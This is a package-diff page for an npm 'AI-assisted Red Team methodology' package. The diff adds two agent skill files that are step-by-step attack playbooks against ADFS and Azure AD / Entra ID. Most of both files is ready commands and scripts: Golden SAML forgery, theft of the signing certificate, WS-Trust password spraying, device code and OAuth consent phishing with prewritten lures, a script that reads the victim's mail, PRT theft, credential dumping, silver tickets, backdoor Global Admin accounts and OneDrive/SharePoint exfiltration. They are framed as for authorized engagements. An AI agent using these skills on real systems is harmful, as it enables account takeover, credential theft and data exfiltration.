npm - rtexit-method - Versions diffs - 0.1.5 → 0.1.6 - Mend

rtexit-method 0.1.5 → 0.1.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (7) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "rtexit-method",
-  "version": "0.1.5",
+  "version": "0.1.6",
   "description": "RTExit - AI-assisted Red Team methodology installer",
   "license": "MIT",
   "author": "Exit Code",

package/packaged-assets/.agents/skills/rt-adfs/SKILL.md ADDED Viewed

@@ -0,0 +1,209 @@
+---
+name: rt-adfs
+description: "Active Directory Federation Services (ADFS) attack skill for authorized engagements. Golden SAML token forgery, ADFS token signing certificate extraction, ImmutableID manipulation for account takeover, ADFS endpoint enumeration, WS-Trust exploitation, ADFS configuration dump, and hybrid identity attack chains. Use when engagement scope includes federated identity or when Azure AD Connect with ADFS is deployed."
+---
+# rt-adfs — ADFS Attack & Golden SAML
+## Overview
+ADFS (Active Directory Federation Services) provides federated SSO — it issues SAML tokens that allow users to authenticate to cloud services (Office 365, Salesforce, AWS) using on-prem credentials. Compromising ADFS = forge tokens for any user, including Global Admin, without knowing passwords.
+**Golden SAML** = SAML equivalent of Kerberos Golden Ticket. Forge a valid SAML assertion for any user using the ADFS token signing certificate.
+---
+## Phase 1 — ADFS Discovery & Enumeration
+```bash
+# Identify ADFS in the environment
+nmap -sV -p 443,49443,80 ADFS_SERVER_IP
+# ADFS typically runs on: adfs.corp.com or sts.corp.com
+# Enumerate ADFS metadata (unauthenticated)
+curl https://adfs.corp.com/federationmetadata/2007-06/federationmetadata.xml
+# Contains: token signing certificate, endpoints, realm info
+# Check authentication type
+curl https://adfs.corp.com/adfs/ls/IdpInitiatedSignon.aspx
+# ADFS sign-in page = confirmation ADFS is present
+# AADInternals — enumerate ADFS config
+Import-Module AADInternals
+$info = Get-AADIntLoginInformation -Domain corp.com
+$info.AuthURL  # Shows ADFS URL if federated
+# Get tenant federation details
+Invoke-AADIntReconAsOutsider -DomainName corp.com
+# If "Federation" = ADFS → Golden SAML is possible
+```
+---
+## Phase 2 — ADFS Token Signing Certificate Extraction
+```bash
+# Token signing cert is the key to Golden SAML
+# Stored on ADFS server — requires local admin or DA
+# Method 1: AADInternals (on ADFS server as local admin)
+Import-Module AADInternals
+Export-AADIntADFSCertificates
+# Output: ADFSSigningCertificate.pfx, ADFSEncryptionCertificate.pfx
+# Method 2: Direct ADFS database (on primary ADFS server)
+# ADFS stores config in: WID (Windows Internal Database) or SQL Server
+# Config DB contains encrypted certs → decrypt with DPAPI
+# Method 3: via DCSync (if ADFS uses gMSA or service account)
+# Extract ADFS service account creds → access ADFS config
+impacket-secretsdump corp.local/admin:Password1@DC_IP | grep "ADFS\|adfssvc"
+# Method 4: Direct certificate store
+# On ADFS server as admin:
+$cert = Get-AdfsCertificate -CertificateType Token-Signing
+$cert.Certificate.Export([System.Security.Cryptography.X509Certificates.X509ContentType]::Pfx, "password")
+[IO.File]::WriteAllBytes("C:\adfs_signing.pfx", $cert)
+```
+---
+## Phase 3 — Golden SAML Forgery
+```bash
+# With token signing certificate → forge SAML for ANY user
+# User doesn't need to exist in Azure AD — ImmutableID maps on-prem to cloud
+# Tool: ADFSpoof / AADInternals
+# AADInternals — forge SAML token
+Import-Module AADInternals
+# Get ImmutableID for target user (maps on-prem GUID to Azure AD)
+$user = Get-ADUser -Identity "administrator" -Properties ObjectGUID
+$immutableId = [System.Convert]::ToBase64String($user.ObjectGUID.ToByteArray())
+# Forge Golden SAML token
+$samlToken = New-AADIntSAMLToken `
+  -ImmutableID $immutableId `
+  -Issuer "https://sts.corp.com/adfs/services/trust" `
+  -PfxFileName "ADFSSigningCertificate.pfx" `
+  -PfxPassword "password"
+# Use token to get Azure AD access token
+$accessToken = Get-AADIntAccessTokenWithSAML -SAMLToken $samlToken -Resource "https://graph.microsoft.com"
+# → Authenticated as Administrator in Azure AD / M365
+# ADFSpoof (Python alternative)
+git clone https://github.com/fireeye/ADFSpoof
+pip3 install -r requirements.txt
+python3 ADFSpoof.py \
+  -b ADFS_CERT.pfx \
+  -s ADFS_CERT_PASSPHRASE \
+  --assertionid "_id123" \
+  --responseid "_id456" \
+  -t corp.com \
+  -u "administrator@corp.com" \
+  --upn "administrator@corp.com" \
+  --objectguid "OBJECT_GUID"
+# Output: base64 SAML token → use in OAuth flow
+```
+---
+## Phase 4 — WS-Trust Exploitation
+```bash
+# WS-Trust = protocol ADFS uses for username/password authentication
+# If WS-Trust endpoint enabled → authenticate directly, bypass web MFA
+# Check WS-Trust endpoints
+curl https://adfs.corp.com/adfs/services/trust/2005/usernamemixed
+curl https://adfs.corp.com/adfs/services/trust/13/usernamemixed
+# AADInternals — use WS-Trust for token
+$token = Get-AADIntAccessTokenUsingWSTrust -Credentials (Get-Credential) `
+  -STSEndpoint "https://adfs.corp.com/adfs/services/trust/13/usernamemixed"
+# Password spray via WS-Trust (bypasses AAD Smart Lockout)
+# WS-Trust uses on-prem lockout policy, not Azure AD SmartLockout
+Invoke-AADIntUserEnumerationAsOutsider -UserList users.txt
+foreach ($user in $users) {
+    Get-AADIntAccessTokenUsingWSTrust -Username $user -Password "Summer2024!" `
+        -STSEndpoint "https://adfs.corp.com/adfs/services/trust/13/usernamemixed" `
+        -ErrorAction SilentlyContinue
+}
+```
+---
+## Phase 5 — ImmutableID Manipulation
+```bash
+# ImmutableID links on-prem AD object to Azure AD account
+# If you can set ImmutableID on a cloud-only account → sync it to your controlled on-prem object
+# Scenario: You have Global Admin in Azure AD (via phishing/consent grant)
+# Target: CEO who uses ADFS SSO
+# Goal: take over CEO's cloud account
+# Step 1: Find CEO's ImmutableID
+Get-AADIntUser -UserPrincipalName "ceo@corp.com" | Select ImmutableId
+# Output: ImmutableId = "abc123=="
+# Step 2: Create controlled on-prem user with same ImmutableID
+New-ADUser -SamAccountName "svc_sync_test" -UserPrincipalName "svc_sync_test@corp.local"
+Set-ADUser -Identity "svc_sync_test" -Replace @{"ms-DS-ConsistencyGuid"=[System.Convert]::FromBase64String("abc123==")}
+# Step 3: Sync to Azure AD (force sync)
+Start-ADSyncSyncCycle -PolicyType Delta  # On AD Connect server
+# Step 4: Now authenticate as CEO via ADFS with your controlled account
+# CEO's cloud account now linked to your on-prem object
+```
+---
+## Phase 6 — ADFS Config Dump
+```bash
+# Full ADFS configuration contains: relying party trusts, claims rules, certs
+# PowerShell on ADFS server
+Get-AdfsProperties | Export-Clixml adfs_properties.xml
+Get-AdfsRelyingPartyTrust | Export-Clixml relying_parties.xml
+Get-AdfsClaimsProviderTrust | Export-Clixml claims_providers.xml
+# Find all applications trusting this ADFS
+Get-AdfsRelyingPartyTrust | Select-Object Name, Identifier, WsFedEndpoint, SamlEndpoints
+# Common relying parties to target:
+# Office 365 (urn:federation:MicrosoftOnline)
+# Salesforce
+# AWS IAM Identity Center
+# ServiceNow, Workday, etc.
+# Each relying party = can be targeted with Golden SAML
+```
+---
+## Skill Levels
+**BEGINNER:** ADFS discovery and metadata enumeration · WS-Trust password spraying
+**INTERMEDIATE:** Token signing certificate extraction via AADInternals · Golden SAML with ADFSpoof
+**ADVANCED:** ImmutableID manipulation for account takeover · Full hybrid identity chain (on-prem → ADFS → Azure AD → M365)
+**EXPERT:** Cross-tenant federation abuse · Custom claims rule manipulation · ADFS persistence via certificate rotation backdoor
+---
+## References
+- AADInternals: https://github.com/Gerenios/AADInternals
+- ADFSpoof: https://github.com/fireeye/ADFSpoof
+- Golden SAML research: https://www.fireeye.com/blog/threat-research/2019/06/hunting-rtm-group-hacking-tricks.html
+- MITRE T1606.002: https://attack.mitre.org/techniques/T1606/002/

package/packaged-assets/.agents/skills/rt-azure-ad/SKILL.md ADDED Viewed

@@ -0,0 +1,315 @@
+---
+name: rt-azure-ad
+description: "Azure Active Directory / Entra ID attack skill for authorized engagements. Device code phishing for token theft, Primary Refresh Token (PRT) abuse, OAuth 2.0 consent grant attacks, Azure AD application abuse, Conditional Access Policy bypass, Guest account abuse, Azure AD Connect exploitation, Seamless SSO silver ticket, and Pass-the-PRT. Use when engagement scope includes Microsoft 365, Azure AD, or hybrid identity environments."
+---
+# rt-azure-ad — Azure Active Directory / Entra ID Attacks
+## Overview
+Azure AD (now Microsoft Entra ID) is the identity backbone for Microsoft 365, Azure, and hybrid on-premises AD environments. Compromising Azure AD provides access to: email (Exchange Online), files (SharePoint/OneDrive), Teams, Azure subscriptions, and on-prem AD via hybrid sync.
+**Key attack vectors:**
+- Phishing tokens (device code, OAuth consent)
+- PRT (Primary Refresh Token) theft from Windows devices
+- Azure AD Connect password sync exploitation
+- Over-privileged applications and service principals
+---
+## Phase 1 — Enumeration (Unauthenticated)
+```bash
+# Install AADInternals (PowerShell — most powerful Azure AD tool)
+Install-Module AADInternals -Scope CurrentUser
+Import-Module AADInternals
+# Enumerate tenant info without credentials
+Invoke-AADIntReconAsOutsider -DomainName corp.com | Format-Table
+# Output:
+# Tenant ID, tenant name, authentication type
+# AAD Connect enabled? (hybrid sync present?)
+# Federation provider (ADFS?)
+# MFA enforced?
+# Check if domain is federated (ADFS) or managed (Azure AD direct)
+Get-AADIntLoginInformation -Domain corp.com
+# Enumerate valid users (no auth needed — response timing)
+Invoke-AADIntUserEnumerationAsOutsider -UserNames users.txt -Domain corp.com
+# Tools
+# ROADtools: https://github.com/dirkjanm/ROADtools
+pip3 install roadtools roadrecon
+roadrecon auth -u user@corp.com -p Password1
+roadrecon gather
+roadrecon gui  # Browse all Azure AD objects at http://localhost:5000
+```
+---
+## Phase 2 — Device Code Phishing (Token Theft)
+```bash
+# Device code flow: user enters code at microsoft.com/devicelogin
+# Attacker polls for token while user authenticates
+# Bypasses password requirement — user just needs to enter a code
+# Very effective: looks like "sign in to this app" — hard to distinguish from legit
+# Generate device code
+Invoke-AADIntDeviceCodeFlow -Resource "https://graph.microsoft.com" -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c"
+# Output:
+# user_code: ABC123DEF  ← send this to target
+# verification_url: https://microsoft.com/devicelogin
+# expires_in: 900 seconds
+# Send phishing message to target:
+# "Please authenticate to our SharePoint portal: go to microsoft.com/devicelogin and enter code: ABC123DEF"
+# Poll for authentication (runs while target enters code)
+# AADInternals polls automatically → outputs access token when user authenticates
+# With token — access all Microsoft services
+$token = Get-AADIntAccessTokenForMSGraph
+Get-AADIntUsers -AccessToken $token  # All Azure AD users
+Invoke-AADIntGetMailboxes -AccessToken $token  # Exchange mailboxes
+# TokenTacticsV2 (more complete device code phishing framework)
+git clone https://github.com/f-bader/TokenTacticsV2
+Import-Module .\TokenTacticsV2.psd1
+Invoke-DeviceCodeFlow  # Interactive — shows code to send target
+```
+---
+## Phase 3 — Primary Refresh Token (PRT) Abuse
+```bash
+# PRT = long-lived token on Azure AD joined/registered Windows devices
+# Stored in LSA — not accessible normally
+# If you have SYSTEM on a Windows device → steal PRT → authenticate as user
+# Check if device is Azure AD joined
+dsregcmd /status | grep -i "AzureAdJoined\|WorkplaceJoined"
+# AzureAdJoined: YES = has PRT
+# Extract PRT with ROADtoken (requires SYSTEM)
+# https://github.com/dirkjanm/ROADtoken
+.\ROADtoken.exe  # Outputs PRT + session key
+# Or with AADInternals
+Get-AADIntUserPRT  # Gets current user's PRT
+Get-AADIntUserPRTToken  # Gets PRT token for use
+# Create cookie from PRT (Pass-the-PRT)
+# Use PRT to authenticate to any Azure AD resource without password
+$prtCookie = New-AADIntUserPRTToken -RefreshToken $prt -SessionKey $sessionKey
+# Use cookie in browser: DevTools → Application → Cookies → x-ms-RefreshTokenCredential = $prtCookie
+# Navigate to portal.azure.com or office.com → authenticated as victim
+# Mimikatz PRT extraction
+sekurlsa::cloudap  # Extracts PRT from LSASS CloudAP provider
+```
+---
+## Phase 4 — OAuth Consent Grant Attack
+```bash
+# Register malicious Azure AD app → trick user into granting permissions
+# No password needed — just user consent
+# App gets long-lived access to: email, files, calendar, contacts
+# Step 1: Register app in attacker tenant
+# Azure Portal → Azure Active Directory → App Registrations → New
+# Name: "Excel Add-in Productivity Tool" (believable)
+# Redirect URI: https://your-server.com/callback
+# API Permissions: Mail.Read, Files.Read.All, Calendars.Read, User.Read
+# Step 2: Craft consent URL
+$clientId = "YOUR_APP_CLIENT_ID"
+$redirectUri = "https://your-server.com/callback"
+$scope = "https://graph.microsoft.com/Mail.Read https://graph.microsoft.com/Files.Read.All offline_access"
+$consentUrl = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?" +
+  "client_id=$clientId&response_type=code&redirect_uri=$redirectUri" +
+  "&scope=$scope&state=12345"
+# Step 3: Send to target (phishing email):
+# "Please authorize the Excel productivity add-in: $consentUrl"
+# Step 4: User clicks → Microsoft consent screen → user approves → redirect with code
+# Exchange code for tokens on your server
+# Step 5: Use refresh token for persistent access
+# Refresh token valid 90 days (or until revoked)
+python3 << 'EOF'
+import requests
+token_url = "https://login.microsoftonline.com/common/oauth2/v2.0/token"
+data = {
+    "client_id": CLIENT_ID,
+    "client_secret": CLIENT_SECRET,
+    "code": AUTH_CODE,
+    "redirect_uri": REDIRECT_URI,
+    "grant_type": "authorization_code"
+}
+r = requests.post(token_url, data=data)
+tokens = r.json()
+print("Access token:", tokens['access_token'][:50])
+print("Refresh token:", tokens['refresh_token'][:50])
+# Read victim's email
+headers = {"Authorization": f"Bearer {tokens['access_token']}"}
+mail = requests.get("https://graph.microsoft.com/v1.0/me/messages", headers=headers)
+print(mail.json())
+EOF
+```
+---
+## Phase 5 — Conditional Access Policy Bypass
+```bash
+# Conditional Access (CA) can require: MFA, compliant device, specific location
+# Bypass techniques:
+# Technique 1: Legacy authentication protocols (if not blocked)
+# Basic Auth to Exchange Online bypasses MFA
+curl -u "user@corp.com:Password1" \
+  "https://outlook.office365.com/api/v2.0/me/messages" \
+  -H "Accept: application/json"
+# Check if legacy auth is allowed
+Get-AADIntTenantDetails | Select-Object allowLegacyAuth
+# Technique 2: Trusted location bypass
+# CA often allows access from "trusted IPs" (office building)
+# If you have a foothold inside the network → access from trusted IP
+# Technique 3: CA doesn't apply to service principals
+# Register app → use app credentials → not subject to user CA policies
+# Technique 4: Continuous Access Evaluation (CAE) gap
+# Tokens valid for 1 hour even if CA policy changes
+# Steal token → use within validity window
+# Technique 5: Named location spoofing
+# Some CA policies allow from "Any Compliant Device"
+# If device is Azure AD joined → PRT automatically satisfies device compliance
+```
+---
+## Phase 6 — Azure AD Connect Exploitation
+```bash
+# Azure AD Connect syncs on-prem AD → Azure AD
+# If you own the AD Connect server → dump all password hashes
+# Find AD Connect server
+Get-ADComputer -Filter {ServicePrincipalName -like "*AADConnect*"} -Properties *
+# Or check for MSOL_ account in AD:
+Get-ADUser -Filter {SamAccountName -like "MSOL_*"} -Properties *
+# Dump AD Connect credentials (AADInternals)
+# Run on AD Connect server as local admin
+Get-AADIntSyncCredentials
+# Output:
+# ADDomain: corp.local
+# ADUsername: MSOL_abc123
+# ADPassword: CLEARTEXT_PASSWORD  ← NTLM sync service account
+# AzureUsername: sync_abc123@corp.onmicrosoft.com
+# AzurePassword: CLEARTEXT_PASSWORD
+# Use Azure sync account to dump ALL hashes via DCSync-equivalent
+# Sync account has "Replicating Directory Changes" rights
+impacket-secretsdump 'corp.local/MSOL_abc123:PASSWORD@DC_IP'
+# Pass hash for all users directly to Azure AD
+# AADInternals: set arbitrary password for any Azure AD user
+Set-AADIntUserPassword -SourceAnchor "SOURCEANCHO=" -Password "NewPassword1!"
+```
+---
+## Phase 7 — Seamless SSO Silver Ticket
+```bash
+# Azure AD Seamless SSO uses Kerberos
+# Service account: AZUREADSSOACC$ — has a known Kerberos key
+# Create silver ticket → authenticate to Azure AD as any user
+# Step 1: Extract AZUREADSSOACC$ password hash
+# (Requires DCSync rights or AD Connect server access)
+impacket-secretsdump corp.local/admin:Password1@DC_IP | grep AZUREADSSOACC
+# Step 2: Forge silver ticket
+python3 ticketer.py \
+  -nthash AZUREADSSOACC_NTHASH \
+  -domain-sid DOMAIN_SID \
+  -domain corp.local \
+  -spn "HTTP/aadg.windows.net.nsatc.net" \
+  TargetUser
+# Step 3: Convert to Azure AD token
+# AADInternals
+$kerbTicket = Get-Content ticket.kirbi
+$token = New-AADIntUserAccessTokenFromKerberos -KerberosTicket $kerbTicket
+# → Authenticated as TargetUser in Azure AD without their password
+```
+---
+## Phase 8 — Post-Compromise Azure AD
+```bash
+# After gaining Azure AD Global Admin or privileged role
+# Enumerate entire tenant
+roadrecon gather --access-token $token
+roadrecon gui
+# Add backdoor credentials to service principal
+# Even if password is reset → backdoor app keeps access
+New-AADIntServicePrincipalCertificate -ApplicationId APP_ID
+# Returns: certificate that authenticates as the service principal
+# Create new Global Admin (persistence)
+New-AADIntUser -UserPrincipalName "svc-monitor@corp.onmicrosoft.com" \
+  -DisplayName "Monitoring Service" \
+  -Password "Secure123!" \
+  -UserRole GlobalAdministrator
+# Golden SAML via AADInternals (if ADFS present — see rt-adfs)
+# Extract ADFS token signing certificate → forge any SAML assertion
+# Exfil via Microsoft Graph
+# Download all OneDrive files
+Get-AADIntOneDriveFiles -AccessToken $token | Export-Csv onedrive_files.csv
+# Download SharePoint
+Get-AADIntSharePointFiles -AccessToken $token -SiteUrl "https://corp.sharepoint.com/sites/internal"
+```
+---
+## Skill Levels
+**BEGINNER:** Device code phishing → access M365 email/files · ROADrecon enumeration
+**INTERMEDIATE:** OAuth consent grant attack · CA policy bypass via legacy auth · Azure AD Connect credential dump
+**ADVANCED:** PRT theft and Pass-the-PRT · Seamless SSO silver ticket · Service principal backdoor
+**EXPERT:** Golden SAML via ADFS + Azure AD trust · Cross-tenant attacks · Full hybrid identity compromise chain
+---
+## References
+- AADInternals: https://github.com/Gerenios/AADInternals
+- ROADtools: https://github.com/dirkjanm/ROADtools
+- TokenTacticsV2: https://github.com/f-bader/TokenTacticsV2
+- Azure AD Kill Chain: https://aadinternals.com/post/azuread_attack/
+- MITRE T1528: https://attack.mitre.org/techniques/T1528/